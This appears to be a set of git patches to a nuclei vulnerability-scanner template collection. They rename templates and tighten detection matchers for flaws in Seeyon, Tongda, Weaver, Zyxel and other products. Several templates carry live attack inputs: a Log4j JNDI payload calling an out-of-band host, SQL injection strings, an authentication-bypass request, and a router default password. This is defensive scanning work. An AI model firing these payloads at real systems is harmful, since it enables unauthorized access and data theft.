From 3531d7df97797493c226be1260c1ed0ba02ccc36 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 09:51:15 +0000
Subject: [PATCH 0423/1090] Auto Generated Templates Checksum [Mon Sep 18
 09:51:15 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index b716fde233..984846b9a9 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2645,6 +2645,7 @@ http/cves/2023/CVE-2023-39676.yaml:66ffbd384c6992c5a70fc66c29a75aa2fdd22f3b
 http/cves/2023/CVE-2023-39677.yaml:daf8c05e33f87e1b63ab7d55a6a05773034db0ac
 http/cves/2023/CVE-2023-4173.yaml:6b300087c13e3a095031bc1a2d0f8d8590f1a6d8
 http/cves/2023/CVE-2023-4174.yaml:d2cf616712e64eea743b6c401fbfd482418ec12e
+http/cves/2023/CVE-2023-41892.yaml:e042c550adbe64454aea30c413ded1b9d7a72814
 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071
 http/cves/2023/CVE-2023-4714.yaml:32a365c876f157b1fd267ee9bb74bac368424042
 http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d
@@ -7077,7 +7078,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:5705b51b55059d177ea9a5fea172cbd2032fdad4
+templates-checksum.txt:e214969d4e15aa9b8fe4aed559e5bc325b412caf
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 1fbc09862c7bed5ac162399e00f70ae8b51bea26 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Mon, 18 Sep 2023 15:25:23 +0530
Subject: [PATCH 0424/1090] regex fix

---
 http/exposures/tokens/jotform/jotform-api-key.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/exposures/tokens/jotform/jotform-api-key.yaml b/http/exposures/tokens/jotform/jotform-api-key.yaml
index 7fa8388da0..ca026d30be 100644
--- a/http/exposures/tokens/jotform/jotform-api-key.yaml
+++ b/http/exposures/tokens/jotform/jotform-api-key.yaml
@@ -20,4 +20,4 @@ http:
       - type: regex
         part: body
         regex:
-          - "^[A-Fa-f0-9]{32}$"
+          - "[0-9a-fA-F]{32}"

From d5dfd3302cc32941e3074cb93845726b2d45c30e Mon Sep 17 00:00:00 2001
From: Ritik Chaddha 
Date: Mon, 18 Sep 2023 18:07:42 +0530
Subject: [PATCH 0425/1090] template update

---
 http/cves/2022/CVE-2022-0342.yaml             |  9 ++++-
 ...l => dlink-centralized-default-login.yaml} |  2 +-
 .../smartbi/smartbi-default-login.yaml        |  2 +
 .../tp-link/tplink-r470gp-default-login.yaml  | 29 --------------
 ...=> aic-intelligent-password-exposure.yaml} |  4 +-
 .../other/seeyon-oa-log4j.yaml                | 23 ++++-------
 ...oleak.yaml => seeyon-config-exposure.yaml} |  4 +-
 ....yaml => seeyon-createmysql-exposure.yaml} |  4 +-
 .../seeyon/seeyon-initdata-exposure.yaml      |  4 +-
 .../smartbi/smartbi-deserialization.yaml      |  2 +-
 ...pload.yaml => tongda-api-file-upload.yaml} |  6 +--
 ...sqli.yaml => tongda-report-func-sqli.yaml} |  9 +++--
 ...-read.yaml => tongda-video-file-read.yaml} |  2 +-
 ...l => wanhu-teleconferenceservice-xxe.yaml} | 18 +++++----
 .../ecology-verifyquicklogin-auth-bypass.yaml | 11 ++----
 .../weaver/weaver-checkserver-sqli.yaml       |  6 +--
 ...-e-cology-workflowcentertreedata-sqli.yaml | 39 -------------------
 .../weaver-ecology-getsqldata-sqli.yaml       |  2 +-
 .../weaver/weaver-mysql-config-info-leak.yaml |  6 +--
 .../yonyou/chanjet-tplus-checkmutex-sqli.yaml | 14 +++++--
 .../yonyou-nc-baseapp-deserialization.yaml    |  4 +-
 21 files changed, 70 insertions(+), 130 deletions(-)
 rename http/default-logins/d-link/{dlink-ac-centralized-management-system-default-login.yaml => dlink-centralized-default-login.yaml} (92%)
 delete mode 100755 http/default-logins/tp-link/tplink-r470gp-default-login.yaml
 rename http/vulnerabilities/other/{aic-intelligent-password-leak.yaml => aic-intelligent-password-exposure.yaml} (89%)
 rename http/vulnerabilities/seeyon/{seeyon-config-infoleak.yaml => seeyon-config-exposure.yaml} (93%)
 rename http/vulnerabilities/seeyon/{seeyon-createmysql-infoleak.yaml => seeyon-createmysql-exposure.yaml} (90%)
 rename http/vulnerabilities/tongda/{tongda-api-arbitrary-file-upload.yaml => tongda-api-file-upload.yaml} (92%)
 rename http/vulnerabilities/tongda/{tongda-report-bi-func-sqli.yaml => tongda-report-func-sqli.yaml} (90%)
 rename http/vulnerabilities/tongda/{tongda-v2017-video-file-read.yaml => tongda-video-file-read.yaml} (94%)
 rename http/vulnerabilities/wanhu/{wanhu-oa-teleconferenceservice-xxe-inject.yaml => wanhu-teleconferenceservice-xxe.yaml} (85%)
 delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-workflowcentertreedata-sqli.yaml

diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml
index 60728caed5..82c34a349f 100644
--- a/http/cves/2022/CVE-2022-0342.yaml
+++ b/http/cves/2022/CVE-2022-0342.yaml
@@ -6,10 +6,13 @@ info:
   severity: critical
   description: |
      An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
+  reference:
+    - https://github.com/gobysec/GobyVuls/blob/3dbd252ebd78dfadf3fa6d99abfbbba79908d6e3/CVE-2022-0342.md?plain=1
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0342
   metadata:
     max-request: 1
-    fofa-query: app="ZyXEL-USG-FLEX"
     verified: true
+    fofa-query: body="/2FA-access.cgi" && body="zyxel zyxel_style1"
   tags: cve,cve2022,zyxel,auth-bypass,router
 
 http:
@@ -22,11 +25,15 @@ http:
       - type: word
         words:
           - "interface-name"
+          - "saved at"
+        condition: and
 
       - type: word
         part: header
         words:
           - "text/zyxel"
+          - "attachment; filename="
+        condition: and
 
       - type: status
         status:
diff --git a/http/default-logins/d-link/dlink-ac-centralized-management-system-default-login.yaml b/http/default-logins/d-link/dlink-centralized-default-login.yaml
similarity index 92%
rename from http/default-logins/d-link/dlink-ac-centralized-management-system-default-login.yaml
rename to http/default-logins/d-link/dlink-centralized-default-login.yaml
index b825c273b8..920767ab3d 100755
--- a/http/default-logins/d-link/dlink-ac-centralized-management-system-default-login.yaml
+++ b/http/default-logins/d-link/dlink-centralized-default-login.yaml
@@ -1,4 +1,4 @@
-id: dlink-ac-centralized-management-system-default-login
+id: dlink-centralized-default-login
 
 info:
   name: D-Link AC Centralized Management System - Default Login
diff --git a/http/default-logins/smartbi/smartbi-default-login.yaml b/http/default-logins/smartbi/smartbi-default-login.yaml
index 6e81c15ce8..5981281965 100755
--- a/http/default-logins/smartbi/smartbi-default-login.yaml
+++ b/http/default-logins/smartbi/smartbi-default-login.yaml
@@ -44,6 +44,8 @@ http:
         part: body
         words:
           - '"result":true'
+          - '"retCode":0'
+        condition: and
 
       - type: word
         part: header
diff --git a/http/default-logins/tp-link/tplink-r470gp-default-login.yaml b/http/default-logins/tp-link/tplink-r470gp-default-login.yaml
deleted file mode 100755
index 72a22019ca..0000000000
--- a/http/default-logins/tp-link/tplink-r470gp-default-login.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: tp-link-tl-r470gp-ac-default-login
-
-info:
-  name: TP-LINK TL-R470GP-AC - Default Login
-  author: SleepingBag945
-  severity: high
-  description: |
-    TP-LINK TL-R470GP-AC 默认口令123456
-  metadata:
-    fofa-query: title="TL-R470GP-AC"
-  tags: tp-link,default-login,router
-
-http:
-  - raw:
-      - |
-        POST / HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json; charset=UTF-8
-        X-Requested-With: XMLHttpRequest
-
-        {"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}}
-
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "\"stok\""
-          - "\"error_code\":0"
-        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/other/aic-intelligent-password-leak.yaml b/http/vulnerabilities/other/aic-intelligent-password-exposure.yaml
similarity index 89%
rename from http/vulnerabilities/other/aic-intelligent-password-leak.yaml
rename to http/vulnerabilities/other/aic-intelligent-password-exposure.yaml
index ac92e017d7..2ddbd95f9e 100755
--- a/http/vulnerabilities/other/aic-intelligent-password-leak.yaml
+++ b/http/vulnerabilities/other/aic-intelligent-password-exposure.yaml
@@ -1,7 +1,7 @@
-id: aic-intelligent-password-leak
+id: aic-intelligent-password-exposure
 
 info:
-  name: AIC Intelligent Campus System - Password Leak
+  name: AIC Intelligent Campus System - Password Exposure
   author: SleepingBag945
   severity: medium
   description: |
diff --git a/http/vulnerabilities/other/seeyon-oa-log4j.yaml b/http/vulnerabilities/other/seeyon-oa-log4j.yaml
index f6063b26cc..15ac089be3 100755
--- a/http/vulnerabilities/other/seeyon-oa-log4j.yaml
+++ b/http/vulnerabilities/other/seeyon-oa-log4j.yaml
@@ -17,8 +17,8 @@ info:
     cwe-id: CWE-77
   metadata:
     max-request: 1
-    fofa-query: app="致远互联-OA"
     verified: true
+    fofa-query: app="致远互联-OA"
   tags: cve,cve2021,rce,jndi,log4j,seeyon-oa,kev,oast
 
 http:
@@ -30,18 +30,11 @@ http:
 
         authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{interactsh-url}}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "dns"
-
-      - type: word
-        part: location
-        words:
-          - "/seeyon/main.do"
-
-      - type: status
-        status:
-          - 302
\ No newline at end of file
+      - type: dsl
+        dsl:
+          - "len(body) == 0"
+          - "status_code == 302"
+          - 'contains(interactsh_protocol, "dns")'
+          - "contains(tolower(header), '/seeyon/main.do')"
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/seeyon/seeyon-config-infoleak.yaml b/http/vulnerabilities/seeyon/seeyon-config-exposure.yaml
similarity index 93%
rename from http/vulnerabilities/seeyon/seeyon-config-infoleak.yaml
rename to http/vulnerabilities/seeyon/seeyon-config-exposure.yaml
index 0ca5504a63..fef9bd717d 100755
--- a/http/vulnerabilities/seeyon/seeyon-config-infoleak.yaml
+++ b/http/vulnerabilities/seeyon/seeyon-config-exposure.yaml
@@ -1,7 +1,7 @@
-id: seeyon-config-infoleak
+id: seeyon-config-exposure
 
 info:
-  name: Seeyon OA A6 config.jsp - Information Leakage
+  name: Seeyon OA A6 config.jsp - Information Disclosure
   author: SleepingBag945
   severity: medium
   description: |
diff --git a/http/vulnerabilities/seeyon/seeyon-createmysql-infoleak.yaml b/http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml
similarity index 90%
rename from http/vulnerabilities/seeyon/seeyon-createmysql-infoleak.yaml
rename to http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml
index a676712360..3752233213 100755
--- a/http/vulnerabilities/seeyon/seeyon-createmysql-infoleak.yaml
+++ b/http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml
@@ -1,7 +1,7 @@
-id: seeyon-createmysql-infoleak
+id: seeyon-createmysql-exposure
 
 info:
-  name: Seeyon OA A6 createMysql.jsp Database - Information Leakage
+  name: Seeyon OA A6 createMysql.jsp Database - Information Disclosure
   author: SleepingBag945
   severity: medium
   description: |
diff --git a/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml b/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml
index 5b43453ab6..0645212bbe 100755
--- a/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml
+++ b/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml
@@ -1,7 +1,7 @@
-id: seeyon-oa-initdataassess-infoleak
+id: seeyon-initdata-exposure
 
 info:
-  name: Seeyon OA A6 initDataAssess.jsp - Information Leakage
+  name: Seeyon OA A6 initDataAssess.jsp - Information Disclosure
   author: SleepingBag945
   severity: medium
   description: |
diff --git a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
index d15db6c37e..52a105cc27 100755
--- a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
+++ b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
@@ -36,7 +36,7 @@ http:
       - type: word
         part: body
         words:
-          - 'H~CxOm~'
+          - '"H~CxOm~"'
 
       - type: word
         part: header
diff --git a/http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml b/http/vulnerabilities/tongda/tongda-api-file-upload.yaml
similarity index 92%
rename from http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml
rename to http/vulnerabilities/tongda/tongda-api-file-upload.yaml
index 961a11bf82..466f7e0804 100755
--- a/http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml
+++ b/http/vulnerabilities/tongda/tongda-api-file-upload.yaml
@@ -1,4 +1,4 @@
-id: tongda-api-arbitrary-file-upload
+id: tongda-api-file-upload
 
 info:
   name: Tongda OA v11.8 api.ali.php - Arbitrary File Upload
@@ -12,7 +12,7 @@ info:
     max-request: 1
     fofa-query: app="TDXK-通达OA"
     verified: true
-  tags: tongda,oa
+  tags: tongda,oa,fileupload
 
 http:
   - raw:
@@ -43,5 +43,5 @@ http:
       - type: dsl
         dsl:
           - 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200'
-          - 'contains(body_2,"OK") && contains(body_3,"phpinfo")'
+          - 'contains(body_2,"+OK") && contains(body_3,"phpinfo")'
         condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/tongda/tongda-report-bi-func-sqli.yaml b/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml
similarity index 90%
rename from http/vulnerabilities/tongda/tongda-report-bi-func-sqli.yaml
rename to http/vulnerabilities/tongda/tongda-report-func-sqli.yaml
index 94fc9237f2..f475f34706 100755
--- a/http/vulnerabilities/tongda/tongda-report-bi-func-sqli.yaml
+++ b/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml
@@ -1,4 +1,4 @@
-id: tongda-report-bi-func-sqli
+id: tongda-report-func-sqli
 
 info:
   name: Tongda OA v11.6 report_bi.func.php - SQL injection
@@ -10,8 +10,8 @@ info:
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
   metadata:
     max-request: 1
-    fofa-query: app="TDXK-通达OA"
     verified: true
+    fofa-query: app="TDXK-通达OA"
   tags: tongda,sqli
 
 http:
@@ -27,8 +27,9 @@ http:
     matchers:
       - type: word
         words:
-          - "root@"
-          - "para"
+          - '"root@'
+          - '"para":'
+          - '"td_oa"'
         condition: and
 
       - type: status
diff --git a/http/vulnerabilities/tongda/tongda-v2017-video-file-read.yaml b/http/vulnerabilities/tongda/tongda-video-file-read.yaml
similarity index 94%
rename from http/vulnerabilities/tongda/tongda-v2017-video-file-read.yaml
rename to http/vulnerabilities/tongda/tongda-video-file-read.yaml
index 9a5a0473d8..968a2b1eb7 100755
--- a/http/vulnerabilities/tongda/tongda-v2017-video-file-read.yaml
+++ b/http/vulnerabilities/tongda/tongda-video-file-read.yaml
@@ -1,4 +1,4 @@
-id: tongda-v2017-video-file-read
+id: tongda-video-file-read
 
 info:
   name: Tongda OA V2017 Video File - Arbitrary File Read
diff --git a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml b/http/vulnerabilities/wanhu/wanhu-teleconferenceservice-xxe.yaml
similarity index 85%
rename from http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml
rename to http/vulnerabilities/wanhu/wanhu-teleconferenceservice-xxe.yaml
index f765502cec..d825bb76a7 100755
--- a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml
+++ b/http/vulnerabilities/wanhu/wanhu-teleconferenceservice-xxe.yaml
@@ -1,7 +1,7 @@
-id: wanhu-oa-teleconferenceservice-xxe
+id: wanhu-teleconferenceservice-xxe
 
 info:
-  name: Wanhu OA TeleConferenceService Interface - XXE
+  name: Wanhu OA TeleConferenceService Interface - XML External Entity Injection
   author: SleepingBag945
   severity: high
   description: |
@@ -33,12 +33,14 @@ http:
         words:
           - "dns"
 
-      - type: word
-        part: header
-        words:
-          - "text/xml"
-
       - type: word
         part: body
         words:
-          - "retcode>"
\ No newline at end of file
+          - ""
+          - ""
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/xml"
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
index 2e5f3a1e1f..40b0e01945 100755
--- a/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
+++ b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
@@ -4,7 +4,8 @@ info:
   name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
   author: SleepingBag945
   severity: high
-  description: There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
+  description: |
+    There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
   reference:
     - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
   metadata:
@@ -16,10 +17,7 @@ http:
       - |
         POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded
-        Accept-Encoding: gzip
 
         identifier=1&language=1&ipaddress=x.x.x.x
 
@@ -29,11 +27,8 @@ http:
         part: body
         words:
           - "\"sessionkey\":"
-
-      - type: word
-        part: body
-        words:
           - "\"message\":"
+        condition: and
 
       - type: status
         status:
diff --git a/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml b/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml
index 7df4502683..c54f83a06c 100644
--- a/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml
@@ -12,8 +12,8 @@ info:
     - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml
   metadata:
     max-request: 1
-    fofa-query: app="泛微-协同办公OA"
     verified: true
+    fofa-query: app="泛微-协同办公OA"
   tags: weaver,ecology,sqli
 
 http:
@@ -25,6 +25,6 @@ http:
       - type: dsl
         dsl:
           - "status_code == 200"
-          - "contains(header, 'application/json')"
-          - "contains(body, 'system error') && !contains(body, 'securityIntercept')"
+          - "contains_all(header, 'application/json','ecology_')"
+          - "contains(body, 'error\":\"system error') && !contains(body, 'securityIntercept')"
         condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-e-cology-workflowcentertreedata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-workflowcentertreedata-sqli.yaml
deleted file mode 100755
index 5fc3631697..0000000000
--- a/http/vulnerabilities/weaver/weaver-e-cology-workflowcentertreedata-sqli.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: weaver-e-cology-workflowcentertreedata-sqli
-
-info:
-  name: weaver e-cology WorkflowCenterTreeData.jsp sqli
-  author: SleepingBag945
-  severity: high
-  description: 2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的,任意攻击者都可借SQL语句拼接时机注入恶意payload,造成SQL注入攻击。
-  reference:
-    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20WorkflowCenterTreeData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
-    - https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/%E6%B3%9B%E5%BE%AEoa/%E6%B3%9B%E5%BE%AEOA%20WorkflowCenterTreeData%E6%8E%A5%E5%8F%A3%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%28%E9%99%90oracle%E6%95%B0%E6%8D%AE%E5%BA%93%29/
-  tags: ecology,weaver,oa,sqli
-
-http:
-  - raw:
-      - |
-        POST /mobile/browser/WorkflowCenterTreeData.jsp HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
-        Content-Type: application/x-www-form-urlencoded
-        Accept-Encoding: gzip
-
-        node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,(4276*908)+order+by+(((1
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"id":"'
-      - type: word
-        part: body
-        words:
-          - '"text":"'
-      - type: status
-        status:
-          - 200
-
-# Enhanced by md on 2022/10/31
diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
index 203a8ba0b0..aed9aa4c01 100755
--- a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
@@ -21,7 +21,7 @@ variables:
 http:
   - method: GET
     path:
-  #    - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
       - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
 
     stop-at-first-match: true
diff --git a/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml b/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml
index e712f08cd0..00d49f1fcd 100644
--- a/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml
+++ b/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml
@@ -1,7 +1,7 @@
-id: weaver-mysql-config-info-leak
+id: weaver-mysql-config-exposure
 
 info:
-  name: OA E-Office mysql_config.ini - Database Information Leakage
+  name: OA E-Office mysql_config.ini - Information Disclosure
   author: SleepingBag945
   severity: high
   description: |
@@ -24,5 +24,5 @@ http:
         dsl:
           - 'status_code == 200'
           - 'contains(header,"text/plain")'
-          - 'contains(body,"datapassword") && contains(body, "datauser")'
+          - 'contains_all(body,"datapassword", "datauser")'
         condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml
index f3844303d8..95466bb07a 100755
--- a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml
@@ -10,9 +10,9 @@ info:
     - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
   metadata:
     max-request: 1
-    fofa-query: app="畅捷通-TPlus"
     verified: true
-  tags: chanjettplus,sqli
+    fofa-query: app="畅捷通-TPlus"
+  tags: chanjet,tplus,sqli
 
 http:
   - raw:
